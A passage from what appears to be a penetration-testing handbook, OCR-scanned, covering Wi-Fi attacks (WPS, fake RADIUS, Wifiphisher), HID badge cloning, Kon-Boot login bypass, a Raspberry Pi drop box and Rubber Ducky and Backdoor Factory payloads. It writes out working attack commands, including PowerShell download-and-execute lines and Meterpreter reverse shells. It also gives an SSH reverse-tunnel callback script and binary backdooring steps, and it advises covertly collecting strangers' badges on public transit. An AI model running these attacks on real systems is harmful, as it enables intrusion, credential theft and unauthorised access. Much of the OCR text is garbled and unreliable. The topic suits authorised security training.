WPS (originally known as Wi-Fi Simple Config) was created to make it simple to establish a secure 
connection to a wireless router/access point. {34} All you need to do is to enter a PIN when 
connecting to an access point without knowing the long complex password. The issue stems from the 
fact that the PINs required could be brute-forced relatively quickly. {35} What's even better is that on 
some access points you cannot disable WPS even if you turn it off in the configuration page. As you 
saw previously with Kismet, the manufacturer of the device can be identified via passive sniffing. 
Here is a Google document that lists a large number of vulnerable devices and the tools that could be 
used to attack WPS: 
http://bit.lv/ leRNOq; . 


The steps to attack WPS are similar to WPAv2, but instead of a Regular Attack, pick the WPS Attack 
and wait for the results. The same Google document just referenced gives the estimated time it would 
take to attack that specific device. 





WPA Enterprise - Fake Radius Attack 

One of my favorite attacks for enterprise environments is the fake radius attack. The problem with 
WPAv2 Enterprise networks is that all the normal WEP/WPAv2 TKIP type attacks do not work. To 
get around this, Josh Wright developed a method to capture username/password combinations for 
WPAv2 Enterprise-grade wireless using a radius server. {36} 


Configuring a Radius server 

To configure your Radius server, we need to download and modify it. Download the Radius software 
(Research, concept, and code originated from: 

( http: //www ■willhackforsushi.com/presentatioas/PEAP_Shmoocon2008_Wri ghtAnto ni c w i cz. pdf ) : 

• wget ftp://ftp.freeradius.or^pub/ffeeradius/old/ffeeradius-server-2.1.12.tar.bz2 

• tarxfj freeradius-server-2.1.12.tar.bz2 

• cd freeradius-server-2.1.12 

• wget http://willhackforsushi.eom/code/ffeeradius-wpe-2.l.12.pateh 

• We need to next patch our Radius server: 

o patch-pi < ffeeradius-wpe-2.1.12.patch 
o ./configure && make && make install 

• We need to edit the configurations: 

o cat» clients.conf «EOF 
o client 192.168.1.1 { 
o secret = mysecret 

° } 

o EOF 

• radiusd -X 

• In a separate terminal: 

o tail -f/usr/local/var/log/radius/ffeeradius-server-wpe.log 










Example Output: 

mschap: Fri Jun7 02:19:39 2013 
username: admin 

challenge: 07:50:2a:b7:a6:4d:24:dl 

response: fc:9d:19:06:c0:79:c3:f5:ad:db:6b:79:59:2f:7f:6e:d8:05:19:c4:5d:26:30:08 

mschap: Sat Jun 8 23:02:39 2013 
username: userl 

challenge: 34:ab:10:95:62:52:85:40 

response: 9e:0c:e7:80:06:2f:a0:0b:c3:d7:c7:d7:c6:38:ec:0a:e5:a3:57:8c:33:2c:8e:0f 
mschap: Sat Jun 8 23:28:43 2013 
username: test 

challenge: 12:ea:fl:24:f5:4b:e8:7e 

response: be:17:da:45:c0:88:ed:9c:eb:c9:5c:38:b8:lf:3e:8f:90:cd:17:16:ad:87:b3:ed 
Once you capture the challenge/response and username for the authentication request, you can move 
on to prepping the password lists. Before you can crack the passwords, you need to convert a word 
list to be used with the Asleap application to try to brute-force passwords. This can be accomplished 
using the following code to convert the darkcOde password list into multiple output files for Asleap. 

• genkeys -r darkcOde. 1st -f words.dat -n words.idx 


Asleap is a tool used to recover LEAP and PPTP type connections, which utilize a password list 
from genkeys. Asleap will take in the challenge and responses as demonstrated below. 


root@bt:-/wireless# asleap -f words.dat -n words.idx -C 07:50:2a 7:a6:4d: 24: dl -R fc:9d: 19:06: 
c0:79:c3:f5:ad:db:6b:79:59:2f:7f:6e:d8:05:19:c4:5d:26:30:08 

asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com> 
hash bytes: 0157 

NT hash: 5e7599f673dfl Id5c5c4d950f5bf0157 

password: hacker 

In the example above, we were able to decrypt the challenge/response ash for a WPA-Enterprise 
authentication. Now, take these credentials and log back into their wireless network. 


Wifite 

f https://github.com/derv82/wifite frKali Linux) 


Wifite is another WIFI attacking tool that I highly recommend using. With similar functionality to fern- 
wifi-cracker, Wifite is another gui-front end to Aircrack-ng and Reaver. In certain cases, I found 
Wifite to work better than my other tools. To start Wifite: 

• cd /opt/wifite 

• python ./wifite.py 




Once you have wifite.py running, it automatically starts scanning the networks for access points. In the 
image below, we identify a WEP network with an ESSID of “me”. 



root@kali: /opt/wifite 
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Wifite Example 


Once you have identified a target, press “CTRL-C” and pick the value of the ESSID you want to 
attack. In this case, we will attack ESSID number 5. Once selected, this will kick off the WEP attack 
to capture and crack IVs. 


[+) 1 target selected. 

[0:10:00] preparing attack "me" (:-l:C9 :46:4t-) 

[0:10:00] attempting fake authentication [1/5]... succ 
[0:10:00] attacking " via ^^replay attack 

[0:07:37] started cracking (over 10000 ivs) 

[0:06:39] captured 2• :: 3 ivs @ 243 iv/sec 

[0:06:39] cracked rue (84:C9: 46:4F)! key: "714 

[♦] 1 attack completed: 


Successful Attack 


That’s pretty much it. Even better, if the access point isn’t vulnerable to WEP attacks, but is 
vulnerable to WPS and utilizes WPAv2, Wifite will kick off Reaver to attack WPS. If that is 
unsuccessful, it will attack WPA by disassociating clients and capturing the authentication handshake. 


WifiPhisher 

( https://github.corn/sophrorfwifiphisher.git RKali Linux) 

Wifiphisher is a security tool that mounts fast, automated phishing attacks against WiFi networks in 
order to obtain secret passphrases and other credentials. It is a social engineering attack that, unlike 
other methods, does not include any brute forcing. It is an easy way for obtaining credentials from 
captive portals and third party login pages or WPA/WPA2 secret passphrases. {37} 







I love seeing creative WIFI type attacks. This is nothing new in terms of standing up a cloned SSID, 
deauthing users, and cloning pages, but WifiPhishing put all these attacks together in an easy-to-use 
script. You do need to make sure that you have two USB network WIFI cards installed. 


• cd /opt/wifiphisher/ 

• python ./wifiphisher.py 


Wifiphisher will stand up a couple web servers and clone an access point of your choice. 


File Edit 

View Search 

root@kali: /opt/wifiphisher 

Terminal Help 
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[*] Starting the fake 

access point. . . 


Wifiphisher 


It will deauth all other users and when they reconnect to our access point, no matter what page they 
visit, they will be redirected to our malicious page. The default page is a router web admin page, but 
we can just as easily use SET from our social engineering section and create a clone page of our 
choice. 



DOWNLOAD AND UPGRADE: 


Current Firmware Version: 1.04 

WPA Password: ••••! 

Submit 


Fake Authentication Page 


Another more manual approach of the same idea is the infernal-twin: 

















https:// github.com/entropyl 337/infernal-twin . 


Feel free to play around with these attacks, develop those that work best for your environment and 
customize them. 


Badge Cloning 


The standard in HID Badge cloning is the Proxmark 3.(38} Although this RFID tag reader/writer is a 
little pricey ($400+), it is a must have. It is important to understand frequency and card types. The kit 
from the HackerWarehouse comes with the following: 

• Low Frequency Antenna - Tuned to operate at 125 kHz and 134 kHz and is capable 
of reading proximity cards at a distance of 4cm. 

• High Frequency Antenna - Tuned to operate at 13.56 mHz and is capable of 
snooping the UID of a Mifare lk classic card at a distance of 3cm. 

• Tag bundle - Includes three type of RFID tags: T5557 (EM4100, HID and indala 
compatible, 125 kHz) read/write card, Mifare IK (13.56 mHz) test card, and EM4100 
(125 kHz) test card. 

• Prox Box 


The most common HID badge card I see is the ProxCard II. This card has been around for a long time 
due to the low cost and ease of use, and is commonly seen in small/medium size companies. Many 
companies that rent space from a shared office building usually do not have a choice in which card 
their building uses. This also means these types of cards won’t be going away anytime soon. 
Penetration testers love the ProxCard II because it does not have any encryption or require 
challenge/response authentication by default. 

Some companies use high frequency cards like Mifare, which use crypto; however even these have 
been found to be vulnerable. {39} In this demonstration, we will focus on the ProxCard II. 




Proxmark3 


Out of the box, the Proxcard II will need to be updated. I won’t go through every step, but a great 

place to get you started is located here: 

https://github.com/Proxmark/proxmark3/wiki/Windows 


I did have some issues trying to get the Proxmark3 to work. So, I have included my notes to help you 
get through the troubleshooting process. 


After the initial driver installation located in section - UPDATE PROXMARK TO THE NEW CDC 
Serial INTERFACE: 

• After I did FLASH New Bootrom in procedure 2 and let go of Proxmark button, it 
still only showed up under libusb-Win32 device instead of on a COM port. 

• I first followed the WINDOWS PROBLEMS IN RECOGNI ZIN G COM PORT 
section to update the drivers while the button was pushed. 

• After completing that, I let go of the button, I unplugged again, pushed button, 
replugged in, COM port showed up (only while button is pushed), and I went ahead 
and updated the FLASH - Bootrombat, FLASH - FPGA fiillimage.bat, and FLASH - 
OS.bat. After that, I let go of the button and everything worked like a charm. Now, if 
everything is working, run the: proxmark3.exe [comport] 


There are many proxmark3 commands {40}, but we will go through the ones that matter. 

• If hid fskdemod - Realtime HID FSK demodulator (Read HID tags) 

• If hid clone - Clone HID to T55x7 (Write Tag ID) to a blank card 


1. First put the Proxmark3 into a listener mode. Any card that is within an inch of the reader will 
show the HID tags. 

2. After we remove the HID card we want to clone, we are going to configure the Proxmark3 to 
write back to a blank card. Put the blank card on the Antenna and use the command” If hid clone 








[TAG ID]” to write to that card. 

3. We need to verify that we wrote to that card by putting the Proxmark3 back in listener mode and 
making sure our new cloned card has the proper HID tags. 


MINGW32yc/Projects/Proxmark/pm3-bm-756 (cdc*lua)/pm3-bm-756Min32 (dient+G 


pn3 /c/Projects/Proxnark/pi 

proxnark3 . exe cor*4 
proxmark3> If hid fskdenod 
ndhtl TAG ID: 2004520045 <26326> 
BdbB TAG ID: 2004520045 
BdbB TAG ID: 2004620046 
Bdbtt TAG ID: 2004620046 
Bdbtt TAG ID: 2004520045 
Ittdbit TAG ID: 2004520045 
t»dbtt TAG ID: 2004520045 
2004520045 


3-bin~756 <cdc+lua)/pr 


t>in-756/win32 <client*6Ui: 


© 


< 26326 ) 

<26326) 

<26326) 

<26326) 

<26326) 

<26326) 

<26326) 


BdbB TAG ID: 

Bdbtt Stopped 

pi'oxniai*k3) If hid clone 2004520045 
Cloning tag with ID 2004520045 
BdbB DONE? 

pi*oxnat*k3> If hid fskdenod 


© 


BdbB TAG ID 
BdbB TAG ID 
BdbB TAG ID 
BdbB TAG ID 
BdbB TAG ID 
BdbB TAG ID 
BdbB TAG ID 
BdbB TAG ID 
BdbB TAG ID 
BdbB TAG ID 
BdbB TAG ID 
BdbB TAG ID 
BdbB TAG ID 


2004520045 <26326) 
2004520045 <26326) 
2004520045 <26326) 
2004520045 <26326) 
2004520045 <26326) 
2004520045 <26326) 
2004520045 <26326) 
2004520045 <26326) 
2004520045 <26326) 
2004520045 <26326) 
2004520045 <26326) 
2004520045 <26326) 
2004520045 <26326) 


© 


Proxmark3 - Badge Cloning 


Once you have your device configured, you can connect the external battery back to the Proxmark3, 
however, you can only clone one badge at a time. To get around this problem and the battery pack 
issue, we turn to Kali Nethunter and a Nexus 7 tablet. 


Get It Working In Kali Nethunter 

rhttps://forums.kali.org/showthread.php?23151 -Tutorial-make- proxmark3-works-with-nethunter f: 

1. Download http://thehackerplaybook.com/Download/proxdroid-bin-848.rar 

2. Inside the proxdroid rar file, you need to copy the file /system/bin/proxmark3 to the Nexus’ 
/system/bin directory. Make sure to change the permissions to [rwxr-xr-x] (chmod 755 
/system/bin/proxmark3) 

3. Next, you need to copy both /system/lib/libreadline.so and /system/lib/libtermcap.so from the 
rar to the /system/lib directory with permission to [rw-r—r—] (chmod 644) 

4. We need to find out which port the Proxmark3 is using when connected to the Nexus Device. A 
quick way to do this is: dmesg 

1. [ 1449.061372] cdcacm 1-2.1:1.0: ttyACMO: USB ACM device 

[ 1449.073765] usbcore: registered new interface driver cdc acm 

[ 1449.073770] cdc acm: USB Abstract Control Model driver for 
USB modems and ISDN adapters 

2. In this case our interface is using ttyACMO 





5. Once we move all the files to our Nexus device and find which interface our Proxmark3 is using, 
we can start up our device: 

1. proxmark3 /dev/[interface - e.g. ttyACMO] in terminal from system/bin 

6. I had errors with permissions on the Nexus when moving the files to /system/bin and /system/lib. 
To fix that issue, I had to re-mount the /system folder. 

1. Nexus7 Genl 

1. mount -o rw,remount /dev/block/platform/sdhci-tegra.3/by-name/APP/system /system ext4 
ro,relatime,user_xatttr,acl,barrier=l,data=ordered 0 0 

2. Nexus7 Gen2 

1. mount -o rw,remount /dev/block/platform/msm_sdcc. 1 /by-name/system /system 









ProxmarkS - Portable with Nexus 


Again, the issue with running a Proxmark3 with a battery pack was that you could only clone one 
card. Moreover, the issue with running it off a laptop is the size. With the Nexus tablet and a tablet 
case, I am able to power and run the Proxmark3 software with full functionality. Holding the tablet 
case, I can easily go in an elevator/sub way/bus, hold my tablet case near everyone’s badge and 
constantly collect them. I can then write them out to cards and use them to walk right in. 


One other thing that I have seen from collecting tag IDs is that companies generally buy tags in bulk. 
The HID tag IDs are set at the manufacturer site, so if you collect a number of tags, you can figure out 
the ranges in which they exist. For example, in the example tag above (2004520045), we can brute- 
force through the tags near that range. Since different badges have different permissions, it is good to 
test if you are able to guess a privileged badge using something like: 
http s: // gi thub. c om/br ad- anton/ pr oxbrute . 


Kon-Boot 

f http://www.piotrbania.com/all/kon-boot/ f (Windows/OS X) 


On a physical test, you might have gotten into the building, but you need a quick and easy way to get 
onto systems and servers. This is where Kon-boot comes into play. Kon-boot is a USB device that 
will allow you to bypass authentication on both Windows and OS X. 


On Windows, Kon-boot has additional functionality to bypass without changing the password. 
However, on OS X, you need to either reset the password to blank or create a new user. There 
software works by “virtually modifying the EFI bios and then modifying parts of the OS X kernel. 
Such changes are only made in virtual memory and they disappear after computer reboot.” 
http://www.piotrbania.com/all/kon-boot/ 




For both Windows and OS X (and Linux), there are known ways to get around authentication. On 
Windows, you can use something like ntpassword{41}, and on OS X, you can drop into single 
usermode and reset the admin password.{42} However, since my focus is really on efficiency, I'll 
you have to do is drop the USB drive, reboot, and log into your victim host. 


The installation is pretty straightforward. After you purchase the corporate version of Kon-Boot, you 
will get a Windows executable. Take any USB stick and it will install Kon-Boot onto that device. All 
you need to do now is carry this little USB device: 



KON-BOOT USB Stick 


Windows 


On a reboot or system startup, make sure it boots from the USB drive so that Kon-Boot will kick in. 



uuu.t he lead82. coet - by Piotr B«ni«/LEftD 82 


» Kon-Boot vor. 2.4 — readyt 32^^4bit tft 

» Please note this software is protected by copyright laws. 
» Checking SHOP BIOS entries ... 

» During BIOS detectefl 


Kon-Boot Bootup 


After Kon-Boot finishes, you will come to a login screen with no password configured. Just hit 
“enter” and you will be in the system. Another benefit is that it installs the sticky key functionality to 
popup a system shell. 

The best part of Kon-Boot is that once you reboot the system, the original password will be put back 
on the system The end user will never know what happened. 


OS X: 








OS X Kon-boot for the most part is similar to the single-user mode reset. Kon-Boot can either reset 
the user account’s password or create a new user account under kon-boot:kon-boot. 



♦ [0] Use kon-boot for Windows (UEFI) 

♦ [1] Use kon-boot for Hoc 
Using kon-boot for Mac! 



Scanning all disk drives 

Found handles-8 (SelfHande-6CB75190) 

MacBootEfi device found, id - 2 (6F7A5390) 

MacBootEfi device found, id - 3 (6F7A3390) 

Found our drive at index-6 (out of 8) 

Found 2 wac devices! 

Installing our driver... 

Please pick your option (0-1): 

* [0] Use bypass feature (no new account) 

♦ [1] Use new-account feature (login: kon-boot password: kon-boot) 
Using bypass wode! 

Driver loaded! 

Ready for lift off! 

Everything seen to be ready <press any key to continues 

I_ 


Kon-boot on OS X 









Kon-boot - OS X No Password 


One thing to note is that this will not work against drives that are encrypted. For most tests these days, 
I am finding that laptops are more often encrypted, while desktops are not. 


Pentesting Drop Box - Raspberry Pi 2 


On a physical engagement, a pentesting drop box is essential to have in your toolkit. You can clone a 
couple badges, sneak your way into a company, drop a device onto the corporate infrastructure, and 
run. Either your drop box connects back via cellular or Wi-Fi, or it creates a remote shell back to a 
server of your choice. 

The big professional version of this is called a PwnPlug and you can purchase one from here: 
http://pwnieexpress.com/products/pwnplug- elite. The only problem is that the cost is pretty 
outrageous and the chance of losing your device is pretty high. 


In the previous Hacker Playbook, we used the oDroid U2, because of the speed and RAM 
requirements. The only downside was that although it was a fraction of the price of the PwnPlug, it 
still came to about $ 100 per box. If you have done a physical test before, you know you have lost a 
few in the process and $100+ adds up quick. 


Luckily for us, the Raspberry Pi 2 was released, which is now six times faster (900 Mhz Quad Core) 
and has 1GB of RAM. {43} 


You will have to buy a few items separately from the board, but not much: 








• Power Adaptor 

• USB Wi-Fi adaptor 

• 8 GB or larger microSD Class 10 or higher card 

• HDMI to view what is going on when booting the first time 



Raspberry Pi 2 Running Kali Linux 


Download Kali Linux Raspberry Pi 2 

• https://www.offensive-security.com/kali-linux-vmware-arm-image-download/ 


Or create your own image: 

• https://itfellover.com/l-kali-from-git-clone-and-booting-in-19-steps/ 

Setting up your new drop box with Kali is pretty easy. The guys over at Offensive Security did some 
great work and included ARM support specifically for one of these devices. 


Once you have downloaded or created the images for the Raspberry Pi 2, we need to install Kali on 
the microSD card. Then plug your SD card into your Kali 64bit OS and locate where that device is. 
You can use dmesg after you plug it in to see where it is installed. Make sure you have it configured 
to the right device. 


Build image on 64 bit version of Kali Linux and write image to SD Card: 

• wget https://raw.githubusercontent.com/offensive-security/kali-arm-build- 
scripts/master/build-deps. sh 

• chmod +xbuild-dep.sh&& ./build-dep.sh 

• dd iff/root/kali-1.1.0-rpi.img off/dev/sdb bs=4M 








Move that SD Card from your Kali host onto the Raspberry Pi 2 and run some initial configurations to 
update SSH, change the password, and expand the drive: 

• update-rc.d -f ssh remove 

• update-rc.d -f ssh defaults 

• dpkg-reconfigure openssh-server 

• passwd 

• wget https://raw.github.com/dweeber/rpiwiggle/master/rpi-wiggle 

• chmod +x rpi-wiggle 

• ./rpi-wiggle 


Afterwards, you can install whichever tools you need to install onto that image. 


Once you have your Raspberry Pi 2 device configured to your liking, we need to install a reverse 
shell to use as a drop box. I developed a quick little script called pi_phone_home. Once installed and 
running, when the drop box is plugged into any network, it automatically phones home and gives the 
attack a full SSH tunnel to the drop box host. 

From a terminal type: 

• git clone https://www.github.com/cheetz/pi_phone_home /opt/pi_phone_home 

• cd /opt/pi_phone_home && chmod +x * 


We also need to make some modifications to the callback script. Remember that this box will log into 
your server on the Internet via SSH and create a local tunnel on your server. You will have to provide 
the script login credentials to your Internet-facing server: 

• gedit callback, sh 

• edit the domains, usernames, passwords, and port numbers 

• #!/bin/sh 

• if ps -ef | grep -v grep | grep [your server you own] ; then 

• exit 0 

• else 

• sshpass -p 'PASSWORD' ssh -o "StrictHostKeyChecking no" -f -N -T - 
R2221:localhost:22 [your server you own] -p22 -1 [USERNAME] »/dev/null & 

• fi 


Once these modifications are made, we can start up the service: 

• ./setup, sh 

The setup file will install the proper dependencies, configure the local ssh server, make 
modifications with the sshd config, and add a cronjob to run the script every two minutes. 



W O j admin — rootgtthehackrrplayboofc: — »h S2xSS , 

root@thehackerplaybook:~# netstat -ano | grep 2221 
tcp 0 0 127.0.0.1:2221 0.0.0.0: 

- LISTEN Off (0.00/0/0) 

tcp 0 0 127.0.0.1:57378 127.0.0. 

1:2221 TIME_WAIT timewait (22.42/0/0) 

tcp 0 0 127.0.0.1:57801 127.0.0. 

1:2221 TIME_WAIT tlmewait (35.47/0/0) 

tcp6 0 0 :: 1:2221 I:* 

LISTEN Off (0.00/0/0) 

root<@thehackerp lay book ssh root@127.0.0.1 -p 2221 I 

root@127.0.0.1’s password: 

Last login: Tue Feb 24 08:13:35 2015 from kali 

M 

The programs included with the Kali GNU/Llnux system I 
are free software; 

the exact distribution terms for each program are del 
scribed in the 

Individual files in /usr/share/doc/*/copyright. 

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to | 
the extent 

permitted by applicable law. 
root@kali:~# hostname 
kali 

root@kali:-# | 


root@kali:/opt/pi_phone_ho«e# ./setup.sh 
Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
openssh-server is already the newest version. 

0 upgraded, 0 newly installed, 0 to remove and 
0 not upgraded. 

Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
openssh-client is already the newest version. 

0 upgraded, 0 newly installed, 0 to remove and 
0 not upgraded. 

Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
sshpass is already the newest version. 

0 upgraded, 0 newly installed, 0 to remove and 
0 not upgraded. 

Generating public/private rsa key pair. 

Enter file in which to save the key (/root/.ssh 
/id_rsa): 

/root/.ssh/id_rsa already exists. 

Overwrite (y/n)7 y 

Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 

Your identification has been saved in /root/.ss 


Dropbox SSH Tunnels 


In the terminal on the right, we kicked off the setup.sh batch file on our Raspberry Pi 2 device. After 
two minutes, the Pi device will connect back to our server (on the left) and login via SSH. It will 
create a tunnel over port 2221. 


We can see this on our server by running “netstat -ano | grep 2221”. If we see an output, we know 
everything has worked perfectly. We can now SSH back through that tunnel to have full access on our 
Raspberry Pi. We can run: 

• ssh [username of Raspberry Pi server]@127.0.0.1 -p [tunnel port] 

As we can see on the left image above, we have connected back to our Raspberry PI through the 
tunnel over SSH and ran a hostname. Now, we can kick off scans, run Metasploit, and more. 


Remember, after the first time you run this code, it adds cronjob to run the script every five minutes. 
So even if you unplug your device and replug it in, it will automatically connect back to your SSH 
server. This is a great drop box to plug in and run away. 


Rubber Ducky 

( http://hakshop.myshopify.com/products/usb-mbber-ducky-deluxe ) 


Rubber Ducky is a USB device that is called a HID or Human Interface Device. Now that most 
systems no longer allow autorun by default, we need to get creative. The Rubber Ducky device looks 
just like the standard USB stick, but instead of storing files and data, they store keystrokes (like 
emulating someone on the keyboard). This is how we can get around issues like autorun and quickly 
use keystrokes to compromise a machine. 

So if we had physical access to a computer and wanted to compromise the system, what would we 
do? One way would be to hit the start menu, drop into an administrative CMD shell (bypassing UAC), 
and execute a PowerShell script to download and execute a malicious payload. This might look like 









the following: 


Ducky admin$ cat duckycode.txt 

• ESCAPE 

• CONTROL ESCAPE (Brings up start menu) 

• DELAY 400 

• STRING cmd (types “cmd”) 

• DELAY 400 

• MENU (right clicks on cmd) 

• DELAY 400 

• STRING a (types “a” to select run as administrator) 

• DELAY 600 

• LEFTARROW (presses the left arrow button) 

• ENTER 

• DELAY 600 

• STRING cmd.exe /c "PowerShell (New-Object 

System.Net. WebClient).DownloadFile('http://l 92.168.0.102Avinword.exe','winword.( 
(New-Object -com Shell. Application). ShellExecute('winword.exe')" (Runs a 
PowerShell script to download and execute a file) 

• ENTER 

• STRING exit (close the command prompt) 

• ENTER 


Try these exact same commands on your Window 7 host and you will see exactly what it is doing. 
Now, we can easily change the string to download a PowerShell script instead and execute a 
Meterpreter shell: 

• Powershell.exe -NoP -NonI -W Hidden -Exec Bypass LEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSplc 
-Shellcode.psI'); Invoke-Shellcode -Payload windows/meterpreter/reversehttps - 
Lhost 192.168.0.102 -Lport 8080 -Force 

The code to run the encoder can be found on your rubber ducky or here: 

https: // drive. goo gle .com/ drive/#folders/0B7uVAbdkMKcXNW 1 KdnBrOzZtV3 c 

The ducky code can be injected into the microSD card using the following command (this was done 
on a Mac, but is also OS independent as it runs JAVA). 


The encoder jar file will take the code we supplied and write to an inject.bin file on the microSD 
card. To write your code, it uses the following syntax: 

• java -jar encoder.jar -i [your code] -o [location and file to which to write on the 
microSD card] 



Example: 

• admins-mbp: Ducky admin$ java -jar encoder.jar -i duckycode.txt -o 
/Volumes/Untitled/ inj ect.bin 


Hak5 Duck Encoder 2.6.3 

Loading File. [ OK ] 

Loading Keyboard File. [ OK ] 

Loading Language File. [ OK ] 

Loading DuckyScript. [ OK ] 

DuckyScript Complete. [ OK ] 

After successfully writing to the microSD card, we can assemble our USB stick again and will be all 
set. Once we plug in this USB drive into a computer, we will see the following on the computer 
screen: 


EH Administrator C:\Windows\System32\cmd.exe - cmd.exe /c 'PowerShell (New-Object 


lcrosoft Windows [tiersion b.1.7601] 

Copyright <c> 2009 Microsoft Corporation. fill rights reseru 

C:\Windows\systen32>cmd.exe /c ’’PowerShell <New-Object Syste 
tion>.ShellExecute< J winword.exe' >" 




Programs (1) 
j cmd.exe 
Document 
] Update 

Files (25) 

] oclExar Qf 
oclExar *5 
] oclExar 
oclExar 
oclExar 
oclExar 
oclExar 
] oclExar 
[^1 oclExar 
I 1 rockyo 
['1 change 

y See more 


Open 

Run as administrator 

7-Zip 

CRC SHA 

Edit with Notepad+ + 

Scan with Microsoft Security Essentials... 
Unpin from Taskbar 
Pin to Start Menu 
Restore previous versions 

Send to 

Cut 

Copy 

Delete 

Open file location 
Properties 



I *e 

Rubber Ducky 



This is only the beginning of what you can do with a HID device. Two additional sites that describe 
additional functionality or pre-made scripts to inject into your rubber ducky are: 

• https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads 

• http: //due ktoolkit-411 .rhcloud.com/ScriptSelection.jsp 

























i/ScriptSeiectionjip C | 0 Q. Search 

mi * Qlm^oei* / Information• 6 Miscellaneous ’ /Outline’ /Rcutt* /Tools * OView Source * (ItOptioni* 


Duck Toolkit 








HOME 

ENCODER 

PAYLOAD GEN 

TWIN DUCK 

ABOUT 

HE 




Create Script 


Reconnaissance 

Computer Information 
User Information 
USB Information 
Sharer! Drive Information 
Program Information 
Installed Updates 
User Document List 
Basic Network Information 
Network Scan 
Port Scan 

Copy W'reless Profile 
Take Screen Captures 
Copy FireFox Profile 
Extract S AM File 


When you have selected all required scripts 


Continue 



Exploitation 

Find and Upload File (FTP) 

Disable Firewall 
Add User 

Open Firewall Port 
Start Wi Fi Access Point 
Share C:\ Drive 
Enable RDP 

Rubber Ducky Payloads 


Conclusion 

Attacks where you need to be physically onsite require a lot of patience 
and practice. As you probably already know, these types of attacks give 
the largest adrenaline rushes. It is very important to keep calm and make 
sure you know exactly what you need to do and do it as quickly as 
possible. The best scenario for you is to be in and out without alarming 
a single person. My advice: practice, practice, and practice. 











The Quarterback Sneak - Evading AY 


My feelings on Anti-Virus (AV) scanners are that they are there to stop the script kiddies or 
oldmalware. If you are using the default settings for Metasploit or using files you downloaded from 
the internet, chances are that you are going to not only get caught, but your whole engagement could be 
over. The element of surprise could play a huge factor in how successfully you move laterally 
throughout the environment. This chapter will go into how to make sure you stay ahead of the curve 
and not alert AV scanners. 


Evading AV 


I regularly run into AV programs that alert or block the standard Meterpreter payload, Windows 
Credential Editor (WCE), or other common penetration testing tools. Even the encoders in 
Metasploit, like msfvenom and Shakata Ga Nai, just aren't cutting it anymore. So here are a slew of 
other options. 


The Backdoor Factory 

( https://github.com/secretsquirrel/the-backdoor-factory ) (Kali Linux) 


The goal of BDF is to patch executable binaries with user desired shellcode and continue normal 
execution of the prepatched state. How can you use this to your advantage? Persistence is the key! 
First, we need to find a file to which to add our shellcode. What is the best method for this? 


Research was done by harmJOy to find the best files to backdoor by searching open shares. {44} What 
if we can search the file share server and find the last accessed file? This way, we know that the files 
are regularly used. If you have a command shell on a victim, you can run the following two 
commands: 

• Powershell.exe "IEX (New-Object 

Net. WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo 
Invoke-ShareFinder -ExcludelPC -ExcludePrint -CheckShareAccess | Out-File - 
Encoding ascii found_shares.txt" 


This first command will find all the shares on the network that the user has access to. You can either 
modify this text file to be more targeted or go the slow route and look at all files. I have found it best 
to modify this file to target file shares on the network: 

• Powershell.exe "IEX (New-Object 

Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo 
Invoke-FileFinder -ShareList .\found_shares.txt -FreshEXEs -ExcludeHidden - 
CheckWriteAccess" 



The second command takes the output from the shares and starts enumerating all the executables and 
finding the LastAccessTime and LastWriteTime. In the example below, we see that Procmon.exe on 
the fileshare has the very last access time. This is an indication that it could be regularly used. If we 
modify this file, there is a good chance that it will get executed continually. 
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PowerView - Invoke-File Finder 














Let’s grab a copy of Procmon.exe from the user and modify that binary Dropping that binary back on 
our Kali host, we can run BDF on that file. We are going to modify the Procmon.exe executable to 
include a Meterpreter reverse https payload and connect back to your Kali host over the specified 
port. 


Open up a terminal using the following commands: 

• cd /opt/the-backdoor-factory/ 

• ./backdoor.py -f -/Desktop/Procmon.exe -s meterpreter reverse https -H <your Kali IP> - 


P 8080 


otQkjti /opt/thc-bxkdoor-fftctor 


j IJ I 1 | HJ ••••\ II • ') |\ \ ’•/ r 


Author: Joshua Pitts 

EimII: tho.aldnlto.nxir[a t]gnall<d o txoa 

Twitter: 8»ldnlte_runr 


2.3. B 


[•) In ths backdoor aodulo 

[•) Chocking If binary la imported 

[•j Gathering flla into 

(•i Reading Win32 entry instructions 

Looking for and sotting salscttd shaUcod* 

[*j Creating Win32 rosuao execution stub 

[•j Looking for cavos that wlU fit tho ainlaun shottcodo length of 762 
[•] *11 ca.es langths: (762,) 


Tho following cavos can bo usod to lnjoct code and pOSSLbly 
continue oxocutlon. 

••Don't Uko what you see? Use ]i»p, Single, append, or ignore."* 

aJLUlaI 

t•1 Cavo 1 length as lnt: 762 

11*1 Available cavos: 

1. Section Bane: .rsrc: Section Bogin: 8xfbe08 End: 8x257866; Cavo begin: 8x28c495 End: 0x29c7d8; Cavo Site: 835 

2. Section Naae: .rsrc; Section Begin: 8xfbe80 End: 0x257886; Cave begin: 0x2418fO End: 8x2425f8; Cave Size: 3336 

3. Section haao: .reloc; Section Bogin: 8x257808 End: 8x263460; Cavo begin: 0i2£3lba End: 8x263400; Cave Size: 12878 

(f| Enter your selection: )| 


BDF Patching 


Once you execute backdoor.py, you need to find a Cave, which is an area of 0’s to hold your 
shellcode. If you don’t like the locations initially suggested, you can press “j” or jump to see 
additional caves. 


43. Section tone 

45. Section tone 

46. Section tone 

47. Section tone 
SI. Section tone 
53. Section tone 
55. Section tone 
65. Section tone 
69. Section tone 

74. Section tone 

75. Section tone 
77. Section tone 
79. Section tone 
89. Section tone 
93. Section tone 
96. Section tone 


.rsrc; 
.rare; 
.rsrc; 
. rsrc; 
.rsrc; 
.rsrt; 
.rsrc; 
. rsrc; 
.rsrc; 
.rsrc; 
.rsrc; 
.rsrc; 
.rsrc; 
.rsrc; 
.rsrc; 
. reloc 


Section Begin 
Section Begin 
Section Begin 
Section Begin 
Section Begin 
Section Begin 
Section Begin 
Section Begin 
Section Begin 
Section Begin 
Section Begin 
Section Begin 
Section Begin 
Section Begin 
Section Begin 
; Section Begin 


BxfbeW End: 0x257800; Ceve begin: 0x22603c End: 0x2281c8 
BxfbeOO End: 8x257000; Ceve begin: 0x22e228 End: Gx22o3c9 
0xfbe0O End: 0x257800; Ceve begin: 0x22ee23 End: 0x22efc8 
